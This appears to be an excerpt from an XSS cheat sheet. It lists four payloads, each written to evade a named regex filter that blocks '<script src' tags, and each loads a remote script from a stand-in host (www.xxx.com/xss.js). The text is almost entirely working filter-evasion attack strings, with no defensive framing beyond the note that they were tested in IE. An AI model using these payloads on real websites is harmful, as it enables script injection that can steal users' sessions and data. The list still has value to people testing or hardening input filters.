1.This was tested in IE, your mileage may vary. For performing XSS on sites that allow "<SCRIPT>" but don't allow "<SCRIPT SRC..." by way of a regex filter "/<script[^>]+src/i":

代码:<SCRIPT a=">" SRC="http://www.xxx.com/xss.js"></SCRIPT>

2.For performing XSS on sites that allow "<SCRIPT>" but don't allow "<script src..." by way of a regex filter "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i"

代码:<SCRIPT =">" SRC="http://www.xxx.com/xss.js"></SCRIPT>

3.Another XSS to evade the same filter, "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i":

代码:<SCRIPT a=">" '' SRC="http://www.xxx.com/xss.js"></SCRIPT>

4.And one last XSS attack to evade, "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i" using grave accents

代码:<SCRIPT a=`>` SRC="www.xxx.com/xss.js"></SCRIPT>